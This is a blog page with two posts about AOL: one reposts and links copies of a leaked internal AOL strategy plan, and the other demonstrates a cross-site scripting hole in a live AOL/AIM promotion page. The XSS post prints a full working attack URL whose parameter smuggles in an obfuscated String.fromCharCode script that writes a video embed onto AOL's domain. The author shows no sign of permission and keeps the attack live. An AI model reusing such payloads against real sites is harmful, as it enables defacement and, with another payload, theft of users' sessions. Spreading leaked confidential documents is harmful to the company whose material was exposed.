search
Carter Cole LinkedInCarters Twitter PageCarter Cole on Facebook Carter Coles RSS
Showing posts with label aol. Show all posts
Showing posts with label aol. Show all posts

Wednesday, March 23, 2011

AOL Way - PDF copy of the leaked master plan

AOL is working to make a comeback... they have a new logo and are trying to make the push back into the market after failing with all those free CDs. SO here are some of their aspirations:

  • He wants pageviews per story to jump from 1,500 to 7,000.
  • He wants video stories to go from being 4% of all stories produced to 70%.
  • He wants the percentage of stories optimized for search engines to reach 95%.

Where did we get all this? the people over at Business Insider found it for us :) then i went and dug up the PDF version and posted it to SlideShare for everyone


some people are already asking on Quora if this type of leak should be legal... well some people better keep hold of their docs a little better i guess

oh and if you cant get it from slideshare heres another copy of the leaked AOL document on Google Docs
at 8:12 AM 0 remarks
Tags: aol, leak, plan

Thursday, August 26, 2010

Attack demonstration of XSS hole in AOL's personalized email landing page

Heres my video about exploiting cross site scripting attacks in the wild, I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 min

See the attack and video live on the page

or watch below (ill have this link live as long as it works)

The javascript we inject is shown below

which url encodes to...
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack meant for educational purposes only... if you want to see my copy is here: AOL XSS attack landing page If you are having issues with XSS attacks on your domain or would like help on securing your application, contact me id love to help

P.S. the tool I used to do string encoding is here
at 8:50 AM 0 remarks
Tags: aol, hacking, xss
Subscribe to: Posts (Atom)